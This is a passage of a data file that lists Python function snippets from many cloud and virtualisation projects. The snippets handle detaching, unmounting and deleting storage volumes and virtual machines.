errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def detach_volume(self, volume):\r\n if hasattr(volume, \"id\"):\r\n volume_id = volume.id\r\n else:\r\n volume_id = volume\r\n return self.ec2.detach_volume(volume_id=volume_id, instance_id=self.instance_id)", "def detach_volume(self, volume_id, instance_id = \"\"):\n response = volume.detach_volume(self.url, self.verb, self.headers,\n self.version, volume_id, instance_id)\n if response is not None :\n res = DetachVolumeResponse.DetachVolumeResponse()\n parseString(str(response.text), res)\n return res\n else :\n return None", "def detach(self, force=False):\r\n instance_id = None\r\n if self.attach_data:\r\n instance_id = self.attach_data.instance_id\r\n device = None\r\n if self.attach_data:\r\n device = self.attach_data.device\r\n return self.connection.detach_volume(self.id, instance_id, device, force)", "def detach_volume(self, volume_id, instance_id=None,\r\n device=None, force=False):\r\n params = {'VolumeId' : volume_id}\r\n if instance_id:\r\n params['InstanceId'] = instance_id\r\n if device:\r\n params['Device'] = device\r\n if force:\r\n params['Force'] = 'true'\r\n return self.get_status('DetachVolume', params, verb='POST')", "def DetachVolume(self, request, global_params=None):\n config = self.GetMethodConfig('DetachVolume')\n return self._RunMethod(\n config, request, global_params=global_params)", "def detachDisk(positive, alias, vmName):\n logger.info(\"Detaching disk %s from vm %s\", alias, vmName)\n disk_attachment = get_disk_attachment(vmName, alias, attr='name')\n return DISK_ATTACHMENTS_API.delete(disk_attachment, positive)", "def detach(self):\n if (self.status == volume_status.ATTACHED or self.status == volume_status.IN_USE) \\\n and self.volume:\n try:\n self.volume.detach()\n except EC2ResponseError, e:\n log.error(\"Detaching volume '%s' from instance '%s' failed. 
Exception: %s\"\n % (self.volume_id, self.app.cloud_interface.get_instance_id(), e))\n return False\n self.wait_for_status(volume_status.AVAILABLE, 240)\n if self.volume and self.status != volume_status.AVAILABLE:\n log.debug('Attempting to detach again.')\n try:\n self.volume.detach()\n except EC2ResponseError, e:\n log.error(\"Detaching volume '%s' from instance '%s' failed. Exception: %s\" % (\n self.volume_id, self.app.cloud_interface.get_instance_id(), e))\n return False\n if not self.wait_for_status(volume_status.AVAILABLE, 60):\n log.warning('Volume {0} did not detach properly. Left in state {1}'\n .format(self.volume_id, self.status))\n return False\n else:\n log.debug(\"Volume '%s' already not attached ('%s')\"\n % (self.volume_id, self.status))\n return False\n return True", "def remove(self, mount_point, delete_vols=False, detach=True):\n log.debug(\"Removing volume-based FS @ mount point {0} (delete_vols: \"\n \"{1}; detach: {2})\".format(mount_point, delete_vols, detach))\n self.unmount(mount_point)\n if detach:\n log.debug(\"Detaching volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if self.detach():\n log.debug(\"Detached volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if ((self.static and (ServiceRole.GALAXY_DATA not in self.fs.svc_roles))\n or delete_vols):\n log.debug(\"Deleting volume {0} as part of {1} removal\".format(\n self.volume_id, self.fs.get_full_name()))\n self.delete()\n else:\n log.debug(\"Unmounted {0} but was instructed not to detach volume {1}\"\n .format(self.fs.get_full_name(), self.volume_id))", "def disk_detach(vmdk_path, vm):\n\n device = findDeviceByPath(vmdk_path, vm)\n\n if not device:\n # Could happen if the disk attached to a different VM - attach fails\n # and docker will insist to sending \"unmount/detach\" which also fails.\n msg = \"*** Detach failed: disk={0} not found. 
VM={1}\".format(\n vmdk_path, vm.config.uuid)\n logging.warning(msg)\n return err(msg)\n\n spec = vim.vm.ConfigSpec()\n dev_changes = []\n\n disk_spec = vim.vm.device.VirtualDeviceSpec()\n disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.remove\n disk_spec.device = device\n dev_changes.append(disk_spec)\n spec.deviceChange = dev_changes\n\n try:\n wait_for_tasks(si, [vm.ReconfigVM_Task(spec=spec)])\n except vim.fault.GenericVmConfigFault as ex:\n for f in ex.faultMessage:\n logging.warning(f.message)\n return err(\"Failed to detach \" + vmdk_path)\n\n setStatusDetached(vmdk_path)\n logging.info(\"Disk detached %s\", vmdk_path)\n return None", "def destroy(self):\r\n\r\n return self.driver.destroy_volume(volume=self)", "def detach(self, storages):\n self.tracer.info(\"%s.attach method called\" % self.__class__.__name__)\n\n # init variables & arrays\n all_pds = []\n all_vgs = []\n unmount_err = 0\n\n # reload global.ini\n self._cfg.reload()\n\n # connect to Google API\n conn = self.api_conn()\n\n # fetch the GCE zone for this host\n zone = self.get_zone(conn, HOSTNAME)\n\n for storage in storages:\n # fetch pd & dev variables for specified partition & usage\n connectionData = self._getConnectionDataForLun(storage.get(\"partition\"), storage.get(\"usage_type\"))\n try:\n pd = connectionData[\"pd\"]\n dev = connectionData[\"dev\"]\n except:\n raise Exception(\"pd or dev not set in global.ini\")\n\n # fetch the host which currently owns the disk & the file path\n path = storage.get(\"path\")\n\n # try to unmount the file system twice\n self._forcedUnmount(dev, path, 2)\n\n # if it's still mounted, try killing blocking processes and umount again\n if os.path.ismount(path):\n self._lsof_and_kill(path)\n self._forcedUnmount(dev, path, 2)\n\n # if still mounted, raise exception. The taking over node will stonith this host\n if os.path.ismount(path):\n self.tracer.warning(\"A PID belonging to someone other than SIDADM is blocking the unmount. This node will be fenced\")\n self._umount(path, lazy=True)\n mount_err = 1\n\n # add to list of devices.\n all_pds.append(pd)\n\n # check to see if the device is a VG. 
If so, add it to the list of VG's\n all_vgs.append(self.get_vg(dev))\n\n # Stop each unique VG\n all_vgs = list(set(all_vgs))\n for vg in all_vgs:\n Helper._runOsCommand(\"sudo /sbin/vgchange -an %s\" % vg, self.tracer)\n self.tracer.info(\"stopping volume group %s\" % (vg))\n\n # for each unique disk detected, detach it using Google API's\n all_pds = list(set(all_pds))\n for pd_member in all_pds:\n self.detach_pd(conn, HOSTNAME, pd_member)\n\n # if there was an error unmounting, self fence\n if unmount_err == 1:\n self.fence(conn, pdhost)\n\n # tell HANA we successfully detached\n return 0", "def detach(self):\n raise io.UnsupportedOperation", "def detach_pd(self, conn, host, pd):\n zone = self.get_zone(conn, host)\n pdhost = self.get_pd_host(conn, pd, zone)\n if pdhost == \"\":\n self.tracer.info(\n \"disk %s is already attached to %s(%s)\" % (pd, host, zone))\n elif pdhost == host:\n self.tracer.info(\"attempting to detach %s from %s(%s)\" % (pd, host, zone))\n operation = conn.instances().detachDisk(project=PROJECT, zone=zone, instance=host, deviceName=pd).execute()\n self.wait_for_operation(conn, operation, zone)\n if self.get_pd_host(conn, pd, zone) == \"\":\n self.tracer.info(\"successfully detached %s from %s(%s)\" % (pd, host, zone))", "def detach_disk_from_vm(self, vm_ref, instance_name, device):\n client_factory = self._session._get_vim().client.factory\n vmdk_detach_config_spec = vm_util.get_vmdk_detach_config_spec(\n client_factory, device)\n disk_key = device.key\n LOG.debug(_(\"Reconfiguring VM instance %(instance_name)s to detach \"\n \"disk %(disk_key)s\") % locals())\n reconfig_task = self._session._call_method(\n self._session._get_vim(),\n \"ReconfigVM_Task\", vm_ref,\n spec=vmdk_detach_config_spec)\n self._session._wait_for_task(instance_name, reconfig_task)\n LOG.debug(_(\"Reconfigured VM instance %(instance_name)s to detach \"\n \"disk %(disk_key)s\") % locals())", "def delete_volume(self, volume):\n nfs_share = volume.get('provider_location')\n if nfs_share:\n nms = self.share2nms[nfs_share]\n vol, parent_folder = self._get_share_datasets(nfs_share)\n folder = '%s/%s/%s' % (vol, parent_folder, volume['name'])\n mount_path = self.remote_path(volume).strip(\n '/%s' % self.VOLUME_FILE_NAME)\n if mount_path in self._remotefsclient._read_mounts():\n cinder.privsep.fs.umount(mount_path)\n try:\n props = nms.folder.get_child_props(folder, 'origin') or {}\n nms.folder.destroy(folder, '-r')\n except utils.NexentaException as exc:\n if 'does not exist' in exc.args[0]:\n LOG.info('Folder %s does not exist, it was '\n 'already deleted.', folder)\n return\n raise\n self._get_capacity_info(nfs_share)\n origin = props.get('origin')\n if origin and self._is_clone_snapshot_name(origin):\n try:\n nms.snapshot.destroy(origin, '')\n except utils.NexentaException as exc:\n if 'does not exist' in exc.args[0]:\n LOG.info('Snapshot %s does not exist, it was '\n 'already deleted.', origin)\n return\n raise", "def detach_all_volumes(self):\n nova_connection = self.source_connection.get_nova_connection(self.source_region_name)\n loop = asyncio.get_event_loop()\n try:\n loop.run_until_complete(self.resource_manager.detach_all_volume(nova_connection))\n except:\n raise", "def _DetachDisk(self, idx, root, _):\n hotmsg = \"\"\n if self.op.hotplug:\n hotmsg = self._HotplugDevice(constants.HOTPLUG_ACTION_REMOVE,\n constants.HOTPLUG_TARGET_DISK,\n root, None, idx)\n\n # Always shutdown the disk before detaching.\n ShutdownInstanceDisks(self, self.instance, [root])\n\n # Rename detached disk.\n #\n # 
Transform logical_id from:\n # <file_storage_dir>/<instance_name>/<disk_name>\n # to\n # <file_storage_dir>/<disk_name>\n if root.dev_type in (constants.DT_FILE, constants.DT_SHARED_FILE):\n file_driver = root.logical_id[0]\n instance_path, disk_name = os.path.split(root.logical_id[1])\n new_path = os.path.join(os.path.dirname(instance_path), disk_name)\n new_logical_id = (file_driver, new_path)\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(root, new_logical_id)])\n result.Raise(\"Failed before detach\")\n # Update logical_id\n self.cfg.SetDiskLogicalID(root.uuid, new_logical_id)\n\n # Remove disk from config\n self.cfg.DetachInstanceDisk(self.instance.uuid, root.uuid)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n return hotmsg", "def delete_volume(self, uid):\n try:\n volInfo = self.get_volume_info(uid)\n except SVCVolumeNotFound as ex:\n LOG.warn(_(\"No volume with UID %s found.\") % uid)\n # assume deleted if not found\n return\n\n volID = volInfo.get(SVC_KEY_VDISK_ID)\n self.remove_fcmapping(uid)\n cmd = \"svctask rmvdisk -force %s\" % (volID)\n self._svc_command(cmd)", "def delete_volume(self, volume):\n LOG.debug('SPDK deleting volume %s', volume.name)\n\n self._delete_bdev(volume.name)", "def volume_delete_by_storage(context, storage_id):\n _volume_get_query(context).filter_by(storage_id=storage_id).delete()", "def delete(self):\r\n return self.connection.delete_volume(self.id)", "def clean(self):\n if self.__volume:\n try:\n if self.volume_active():\n cinder_utils.delete_volume(self._cinder, self.__volume)\n else:\n logger.warn('Timeout waiting to delete volume %s',\n self.__volume.name)\n except NotFound:\n pass\n\n try:\n if self.volume_deleted(block=True):\n logger.info(\n 'Volume has been properly deleted with name - %s',\n self.volume_settings.name)\n self.__vm = None\n else:\n logger.error(\n 'Volume not deleted within the timeout period of %s '\n 'seconds', VOLUME_DELETE_TIMEOUT)\n except Exception as e:\n logger.error(\n 'Unexpected error while checking VM instance status - %s',\n e)\n\n self.__volume = None\n\n super(self.__class__, self).clean()", "def delete(**_):\n\n volume_id = utils.get_external_resource_id_or_raise(\n 'delete EBS volume', ctx.instance)\n\n if _delete_external_volume():\n return\n\n ctx.logger.debug('Deleting EBS volume: {0}'.format(volume_id))\n\n if not _delete_volume(volume_id):\n return ctx.operation.retry(\n message='Failed to delete volume {0}.'\n .format(volume_id))\n\n utils.unassign_runtime_property_from_resource(\n constants.ZONE, ctx.instance)\n\n utils.unassign_runtime_property_from_resource(\n constants.EXTERNAL_RESOURCE_ID, ctx.instance)\n\n ctx.logger.info(\n 'Deleted EBS volume: {0}.'\n .format(volume_id))", "def umount(self, vol_name, mountpoint, instance):\n LOG.debug('_HostMountState.umount(vol_name=%(vol_name)s, '\n 'mountpoint=%(mountpoint)s) generation %(gen)s',\n {'vol_name': vol_name, 'mountpoint': mountpoint,\n 'gen': self.generation}, instance=instance)\n with self._get_locked(mountpoint) as mount:\n try:\n mount.remove_attachment(vol_name, instance.uuid)\n except KeyError:\n LOG.warning(\"Request to remove attachment (%(vol_name)s from \"\n \"%(mountpoint)s, but we don't think it's in use.\",\n {'vol_name': vol_name, 'mountpoint': mountpoint},\n instance=instance)\n\n if not mount.in_use():\n mounted = os.path.ismount(mountpoint)\n\n if mounted:\n mounted = self._real_umount(mountpoint)\n\n # Delete our record entirely if it's 
unmounted\n if not mounted:\n del self.mountpoints[mountpoint]\n\n LOG.debug('_HostMountState.umount() for %(mountpoint)s '\n 'generation %(gen)s completed successfully',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)", "def _detach_external_volume_or_instance():\n\n if not utils.use_external_resource(ctx.source.node.properties) \\\n or not utils.use_external_resource(\n ctx.target.node.properties):\n return False\n\n utils.unassign_runtime_property_from_resource(\n 'instance_id', ctx.source.instance)\n ctx.logger.info(\n 'Either instance or EBS volume is an external resource so not '\n 'performing detach operation.')\n return True", "def unassign_volume(VolumeId=None):\n pass", "def fusion_api_delete_storage_volume(self, name=None, uri=None, param='', api=None, headers=None):\n return self.volume.delete(name=name, uri=uri, param=param, api=api, headers=headers)", "def delete_volume(self, volume):\n vg_name = self.get_volume_group_name(volume.id)\n vol_name = self.get_volume_name(volume.id)\n try:\n if self._get_is_replica(volume.volume_type) and self.replica:\n self._delete_volume_replica(volume, vg_name, vol_name)\n\n LOG.debug(\"Searching and deleting volume: %s in K2.\", vol_name)\n vol_rs = self.client.search(\"volumes\", name=vol_name)\n if vol_rs.total != 0:\n vol_rs.hits[0].delete()\n LOG.debug(\"Searching and deleting vg: %s in K2.\", vg_name)\n vg_rs = self.client.search(\"volume_groups\", name=vg_name)\n if vg_rs.total != 0:\n vg_rs.hits[0].delete()\n except Exception as ex:\n LOG.exception(\"Deletion of volume %s failed.\", vol_name)\n raise KaminarioCinderDriverException(reason=ex)", "def delete_volume(self, context, volume_id, unmanage_only=False):\n context = context.elevated()\n\n volume_ref = self.db.volume_get(context, volume_id)\n\n if context.project_id != volume_ref['project_id']:\n project_id = volume_ref['project_id']\n else:\n project_id = context.project_id\n\n LOG.info(_(\"volume %s: deleting\"), volume_ref['id'])\n if volume_ref['attach_status'] == \"attached\":\n # Volume is still attached, need to detach first\n raise exception.VolumeAttached(volume_id=volume_id)\n\n self._notify_about_volume_usage(context, volume_ref, \"delete.start\")\n self._reset_stats()\n\n try:\n self._delete_cascaded_volume(context, volume_id)\n except Exception:\n LOG.exception(_(\"Failed to deleting volume\"))\n # Get reservations\n try:\n reserve_opts = {'volumes': -1, 'gigabytes': -volume_ref['size']}\n QUOTAS.add_volume_type_opts(context,\n reserve_opts,\n volume_ref.get('volume_type_id'))\n reservations = QUOTAS.reserve(context,\n project_id=project_id,\n **reserve_opts)\n except Exception:\n reservations = None\n LOG.exception(_(\"Failed to update usages deleting volume\"))\n\n # Delete glance metadata if it exists\n try:\n self.db.volume_glance_metadata_delete_by_volume(context, volume_id)\n LOG.debug(_(\"volume %s: glance metadata deleted\"),\n volume_ref['id'])\n except exception.GlanceMetadataNotFound:\n LOG.debug(_(\"no glance metadata found for volume %s\"),\n volume_ref['id'])\n\n self.db.volume_destroy(context, volume_id)\n LOG.info(_(\"volume %s: deleted successfully\"), volume_ref['id'])\n self._notify_about_volume_usage(context, volume_ref, \"delete.end\")\n\n # Commit the reservations\n if reservations:\n QUOTAS.commit(context, reservations, project_id=project_id)\n\n self.publish_service_capabilities(context)\n\n return True", "async def async_volume_down(self) -> None:\n await self._volumio.volume_down()", "def terminate_volumes(db, 
context, instance_id):\n volume_api = volume.API()\n for bdm in db.block_device_mapping_get_all_by_instance(context,\n instance_id):\n #LOG.debug(_(\"terminating bdm %s\") % bdm)\n if bdm['volume_id'] and bdm['delete_on_termination']:\n volume_api.delete(context, bdm['volume_id'])\n db.block_device_mapping_destroy(context, bdm['id'])", "def test_detach_volume_force(self, remove_mock, terminate_mock, exc_mock):\n connector = mock.Mock()\n connector.disconnect_volume.side_effect = Exception\n # TODO(geguileo): Remove this ExceptionChainer simulation once we\n # release OS-Brick version with it and bump min version.\n exc = exc_mock.ExceptionChainer.return_value\n exc.context.return_value.__enter__.return_value = exc\n exc.context.return_value.__exit__.return_value = True\n\n volume = {'id': fake.VOLUME_ID}\n attach_info = {'device': {},\n 'connector': connector,\n 'conn': {'data': {}, }}\n\n # TODO(geguileo): Change TypeError to ExceptionChainer once we release\n # OS-Brick version with it and bump min version.\n self.assertRaises(TypeError,\n self.volume.driver._detach_volume, self.context,\n attach_info, volume, {}, force=True)\n\n self.assertTrue(connector.disconnect_volume.called)\n self.assertTrue(remove_mock.called)\n self.assertTrue(terminate_mock.called)\n self.assertEqual(3, exc.context.call_count)", "def delete(self, volume_id):\n self.client().volumes.delete(volume_id)", "def remove_volume(self, instanceId):\n logging.info(\"Stopping FS container for instance %s\", instanceId)\n user, instance = _get_user_and_instance(self.girder_client, instanceId)\n\n if 'containerInfo' not in instance:\n logging.warning(\"No containerInfo for instance %s\", instanceId)\n return\n containerInfo = instance[\"containerInfo\"] # VALIDATE\n FSContainer.stop_container(containerInfo[\"fscontainerId\"])\n logging.info(\"FS container %s stopped\", containerInfo[\"fscontainerId\"])", "def delete(vmname, deldisk=True):\n\n dom = _conn.lookupByName(vmname)\n if dom.isActive():\n dom.destroy()\n infokeeper.update_status_vm(vmname, Instance.STATUS_POWER_OFF)\n dom.undefine()\n infokeeper.delete_vm(vmname)\n if deldisk:\n os.remove(os.path.join(base_disk_path, dom.name() + '.img'))\n return 'VM %s deleted' % vmname", "async def delete(self, job):\n # nothing to delete if it doesn't exist\n info = await self.middleware.call('gluster.volume.exists_and_started', CTDB_VOL_NAME)\n if not info['exists']:\n return\n\n # stop the gluster volume\n if info['started']:\n options = {'args': (CTDB_VOL_NAME,), 'kwargs': {'force': True}}\n job.set_progress(33, f'Stopping gluster volume {CTDB_VOL_NAME!r}')\n await self.middleware.call('gluster.method.run', volume.stop, options)\n\n # finally, we delete it\n job.set_progress(66, f'Deleting gluster volume {CTDB_VOL_NAME!r}')\n await self.middleware.call('gluster.method.run', volume.delete, {'args': (CTDB_VOL_NAME,)})\n job.set_progress(100, f'Successfully deleted {CTDB_VOL_NAME!r}')", "def umount(vol_name, mountpoint, instance):\n with __manager__.get_state() as mount_state:\n mount_state.umount(vol_name, mountpoint, instance)", "async def volume_down(self) -> None:\n return await self.relay(\"volume_down\")()", "async def volume_down(self) -> None:\n return await self.relay(\"volume_down\")()", "def remove():\n vbox = Vbox(env.vm_name)\n vbox.remove()", "def vm_deprovision(self, params: dict) -> Tuple[\"Status\", dict]:", "def destroy(self, log_level=''):\n # Get all the additional volumes and detach,delete.\n volumes = self.utils.get_volumes_with_tag(\n {'cluster_name': 
config.ENV_DATA['cluster_name']}\n )\n self.flexy_instance.destroy()\n self.utils.detach_and_delete_vols(volumes)", "def deregister_volume(VolumeId=None):\n pass", "def destroy_node(self):\n driver = self.driver\n driver.ex_detach_floating_ip_from_node(self.node, self.floating_ip)\n driver.destroy_node(self.node)\n sleep(15)\n for volume in self.volumes:\n driver.destroy_volume(volume)", "async def eject(self) -> None:\n await self.dbus.Drive.call_eject(UDISKS2_DEFAULT_OPTIONS)", "def delete_volume_deallocate(self, vol_id):\n try:\n if not self.module.check_mode:\n self.provisioning.deallocate_volume(vol_id)\n self.provisioning.delete_volume(vol_id)\n return True\n except Exception as e:\n error_msg = 'Delete volume %s failed with error %s ' \\\n % (vol_id, str(e))\n self.show_error_exit(msg=error_msg)", "def destroy(vm, env=''):\n local( main_dir + '/vagrant/bin/vm.sh destroy ' + str(vm) + ' ' + str(env) )", "def detach_from_s2_shared_target(self,\n shared_target,\n volumes,\n **ignore):\n action = const.ACTION_DETACH_FROM_S2_SHARED_TARGET\n valid_keys = [\n 'shared_target', 'volumes',\n ]\n body = filter_out_none(locals(), valid_keys)\n if not self.conn.req_checker.check_params(\n body,\n list_params=['volumes'],\n ):\n return None\n\n return self.conn.send_request(action, body)", "def unmount_volume(self, kwargs):\n\n exp_params = [('vol_name', is_string)]\n try:\n vol_name = check_arguments(exp_params, kwargs)\n self.check_volume_name(vol_name)\n except Exception as ex:\n return HttpErrorResponse(\"%s\" % ex)\n\n self.logger.info(\"Unmount operation starting up for volume '%s'\"\n % vol_name)\n\n try:\n self._unmount(vol_name)\n except Exception as e:\n self.logger.exception(\"Failed to unmount volume '%s'\" % vol_name)\n return HttpErrorResponse('Failed to unmount volume: ' + e.message)\n\n self.logger.info('Unmount operation completed')\n return HttpJsonResponse()", "def database_volume_delete(volume_uuid):\n db = database_get()\n session = db.session()\n query = session.query(model.Volume)\n query.filter(model.Volume.uuid == volume_uuid).delete()\n session.commit()", "def detach_error(self) -> \"VolumeError\":\n return typing.cast(\n \"VolumeError\",\n self._properties.get(\"detachError\"),\n )", "def delete(self):\n for lv in self.logical_volumes:\n self.delete_lv(lv_name=lv)\n\n super().delete()", "def do_delete_configured_volume(self, arg):\n args = self.parse_arguments(arg)\n if len(args) == 0:\n self.perror(\"No storage specified.\")\n return\n self.do_coroutine(self._localStorageRoutines.delete_configured_volume_routine(args[0]))", "def detach(self):\n raise NotImplementedError()", "def disconnect_disk_from_mgmt(self, vios_uuid, disk_name):\n raise NotImplementedError()", "def destroy_vm_vdis(name=None, session=None, call=None):\n if session is None:\n session = _get_session()\n ret = {}\n # get vm object\n vms = session.xenapi.VM.get_by_name_label(name)\n if len(vms) == 1:\n # read virtual block device (vdb)\n vbds = session.xenapi.VM.get_VBDs(vms[0])\n if vbds is not None:\n x = 0\n for vbd in vbds:\n vbd_record = session.xenapi.VBD.get_record(vbd)\n if vbd_record[\"VDI\"] != \"OpaqueRef:NULL\":\n # read vdi on vdb\n vdi_record = session.xenapi.VDI.get_record(vbd_record[\"VDI\"])\n if \"iso\" not in vdi_record[\"name_label\"]:\n session.xenapi.VDI.destroy(vbd_record[\"VDI\"])\n ret[\"vdi-{}\".format(x)] = vdi_record[\"name_label\"]\n x += 1\n return ret", "def tearDown(self):\n\n # stopping the volume\n g.log.info(\"Starting to Unmount Volume and Cleanup Volume\")\n ret = 
self.unmount_volume_and_cleanup_volume(mounts=self.mounts)\n if not ret:\n raise ExecutionError(\"Failed to Unmount Volume and Cleanup Volume\")\n g.log.info(\"Successful in Unmount Volume and Cleanup Volume\")\n\n # Calling GlusterBaseClass tearDown\n GlusterBaseClass.tearDown.im_func(self)", "def umount_root_vm(self):\n print \"demontage de la partition root de %s\" % name_vm_dest\n self.exec_cmd(\"umount %s\" % self.rep_vhosts_vm)", "def terminate_connection(self, volume, connector, **kwargs):\n # TODO: Add support for force and other parameters\n if self.share_targets:\n self._locked_unmap_volume(volume, connector)\n LOG.info('Volume %s is no longer exported', volume.id)", "def destroy():\n # instance first\n old_vm = _existing.vm\n _destroy_resource('vm')\n if not dry and old_vm is not None:\n # Wait for instance to be fully terminated before carrying on or we will have\n # dependency issues.\n print('Waiting for instance to be terminated before deleting other resources...')\n old_vm.wait_until_terminated()\n time.sleep(1) # One would think that wait for terminated should be enough...\n\n _destroy_resource('disk')\n\n # detach before destroy\n _detach_vpc_igw(vpc=_existing.vpc, igw=_existing.igw)\n _destroy_resource('igw')\n\n # sg and sub before vpc\n _destroy_resource('sg')\n _destroy_resource('sub')\n\n _destroy_resource('vpc')", "def _cleanup_instance(self, instance):\n # 1 clean os disk vhd\n # vm = self._get_instance(instance.uuid)\n # os_blob_uri = vm.storage_profile.os_disk.vhd.uri\n # os_blob_name = instance.uuid\n disk_name = self._get_name_from_id(instance.uuid)\n try:\n self._delete_disk(disk_name)\n LOG.info(_LI(\"Delete instance's Volume\"), instance=instance)\n except Exception as e:\n LOG.warning(_LW(\"Unable to delete blob for instance\"\n \" %(instance_uuid)s in Azure because %(reason)s\"),\n dict(instance_uuid=instance.uuid,\n reason=six.text_type(e)))\n\n # 2 clean network interface\n try:\n async_vm_action = self.network.network_interfaces.delete(\n CONF.azure.resource_group, instance.uuid\n )\n async_vm_action.wait(CONF.azure.async_timeout)\n LOG.info(_LI(\"Delete instance's Interface\"), instance=instance)\n except Exception as e:\n LOG.warning(_LW(\"Unable to delete network interface for instance\"\n \" %(instance_uuid)s in Azure because %(reason)s\"),\n dict(instance_uuid=instance.uuid,\n reason=six.text_type(e)))", "def volume_down(self):\n self._remote.volume(int(self._volume * 60) - 2)", "def peer_detach(self):\n cmd = \"gluster peer detach %s\"%(self.server)\n if self.force is True:\n cmd = cmd + ' force'\n cmdlist = shlex.split(cmd)\n output = subprocess.Popen(cmdlist, stdout = subprocess.PIPE,\n stderr = subprocess.PIPE)\n # TODO: Do more extensive error check\n stdout = output.stdout.read()\n stderr = output.stderr.read()\n print json.dumps({\n \"Server detached\": self.server,\n \"Status\": stdout\n })", "def detach_entity(self, entity_id):\n attachment = getattr(self.entities[entity_id],\n self.attachment_system.system_id)\n if not attachment.is_root:\n self.attachment_system.detach_child(entity_id)", "def unmount(self, path=None, vm=None):\n os.system(f\"multipass unmount {vm}:{path}\")\n dict_result = self._get_mount_status(vm=vm)\n return dict_result", "def detachDiskFromMinipad(self , disk):\n return", "def unmap_volume(self, host_name, volume_name):\n cmd = \"svctask rmvdiskhostmap -host %s %s\" % \\\n (host_name, volume_name)\n self._svc_command(cmd)", "def remove_volume(self, oid, volume_id):\n path = '/servers/%s/os-volume_attachments/%s' % 
(oid, volume_id)\n res = self.client.call(path, 'DELETE', data='', \n token=self.manager.identity.token)\n self.logger.debug('Remove volume %s from server %s: %s' % \n (volume_id, oid, truncate(res)))\n return res[0]", "def update_volume_after_detach(self, info, vms):\n info[0]['AttachedToVm'] = vms\n if len(vms) == 0:\n info[0]['machine_path'] = None\n info[0]['State'] = 'available'\n info[0]['time'] = datetime.datetime.now()\n return info", "def cleanup(self, context, instance, network_info, block_device_info=None,\n destroy_disks=True):\n container_id = self._find_container_by_name(instance['name']).get('id')\n if not container_id:\n return\n self.docker.destroy_container(container_id)\n network.teardown_network(container_id)\n self.unplug_vifs(instance, network_info)", "def fusion_api_delete_storage_volume_template(self, name=None, uri=None, api=None, headers=None):\n return self.template.delete(name=name, uri=uri, api=api, headers=headers)", "def DetachLun(self, request, global_params=None):\n config = self.GetMethodConfig('DetachLun')\n return self._RunMethod(\n config, request, global_params=global_params)", "def test_aws_service_api_volume_delete(self):\n pass", "def purge_volume(self, volume_path, data_isolated=False):\n\n trash = os.path.join(self.volume_prefix, \"_deleting\")\n trashed_volume = os.path.join(trash, volume_path.volume_id)\n\n try:\n self.fs.stat(trashed_volume)\n except cephfs.ObjectNotFound:\n log.warning(\"Trying to purge volume '{0}' but it's already been purged\".format(\n trashed_volume))\n return\n\n def rmtree(root_path):\n log.debug(\"rmtree {0}\".format(root_path))\n dir_handle = self.fs.opendir(root_path)\n d = self.fs.readdir(dir_handle)\n while d:\n if d.d_name not in [\".\", \"..\"]:\n # Do not use os.path.join because it is sensitive\n # to string encoding, we just pass through dnames\n # as byte arrays\n d_full = \"{0}/{1}\".format(root_path, d.d_name)\n if d.is_dir():\n rmtree(d_full)\n else:\n self.fs.unlink(d_full)\n\n d = self.fs.readdir(dir_handle)\n self.fs.closedir(dir_handle)\n\n self.fs.rmdir(root_path)\n\n rmtree(trashed_volume)\n\n if data_isolated:\n pool_name = \"{0}{1}\".format(self.POOL_PREFIX, volume_path.volume_id)\n osd_map = self._rados_command(\"osd dump\", {})\n pool_id = self._get_pool_id(osd_map, pool_name)\n mds_map = self._rados_command(\"mds dump\", {})\n if pool_id in mds_map['data_pools']:\n self._rados_command(\"mds remove_data_pool\", {\n 'pool': pool_name\n })\n self._rados_command(\"osd pool delete\",\n {\n \"pool\": pool_name,\n \"pool2\": pool_name,\n \"sure\": \"--yes-i-really-really-mean-it\"\n })", "def DetachAttachRoot(self, zone = None):\n instances = self.tester.ec2.get_instances(state=\"stopped\",zone=zone)\n if len(instances) == 0:\n raise Exception(\"Did not find any stopped instances\"\n \" to detach/attach root\")\n for instance in instances:\n self.assertTrue(3 == len(instance.block_device_mapping),\n \"Did not find three BDM for the instance\")\n root_vol_id = instance.block_device_mapping[self.root_volume_path].volume_id\n self.detachVolumeByPath(instance, self.root_volume_path)\n self.detachVolumeByPath(instance, self.test_volume_1_path)\n instances = self.tester.ec2.get_instances(idstring=instance.id)\n if len(instances) != 1:\n raise Exception(\"Could not find the instance\")\n instance = instances[0]\n root_volume = self.tester.ec2.get_volumes(volume_id=root_vol_id)[0]\n self.volume = root_volume\n self.tester.ec2.attach_volume(instance, root_volume, self.root_volume_path)", "def 
remove_export(self, context, volume):\n if not self.share_targets:\n self._locked_unmap_volume(volume)\n LOG.info('Volume %s is no longer exported', volume.id)", "def down(\n context,\n user=get_local_user(),\n remote=False,\n instance=None,\n stack=None,\n images=\"all\",\n volumes=True,\n orphans=False,\n):\n command = f\"down --rmi {images}\"\n\n if volumes:\n command = f\"{command} --volumes\"\n\n if orphans:\n command = f\"{command} --remove-orphans\"\n\n run_command(context, user, remote, instance, stack, command)", "def volume_down(hass, entity_id=None):\n data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}\n\n hass.services.call(DOMAIN, SERVICE_VOLUME_DOWN, data)", "def eject(mountpoint=DMG_MOUNT, silent=False, dry_run=ARGS.dry_run):\n if not isinstance(mountpoint, Path):\n mountpoint = Path(mountpoint)\n\n cmd = ['/usr/bin/hdiutil', 'eject', str(mountpoint)]\n\n if not dry_run and not mountpoint.exists():\n LOG.warning('Cannot unmount {mountpoint} - it does not exist'.format(mountpoint=mountpoint))\n elif not dry_run and mountpoint.exists():\n _p = subprocess.run(cmd, capture_output=True, encoding='utf-8')\n LOG.debug('{cmd} ({returncode})'.format(cmd=' '.join([str(x) for x in cmd]), returncode=_p.returncode))\n\n if _p.returncode == 0:\n if not silent:\n LOG.info('Unmounted {mountpoint}'.format(mountpoint=mountpoint))\n else:\n LOG.debug('Error: '. _p.stderr.strip() if _p.stderr else _p.stdout.strip())\n elif ARGS.dry_run and not dry_run:\n LOG.warning('Unmount {mountpoint}'.format(mountpoint=mountpoint))", "def down():\n\n # Stop the program if no init has occurred.\n Vagrant.stop_if_not_init()\n\n # Run vagrant halt from the vagrant folder.\n command = 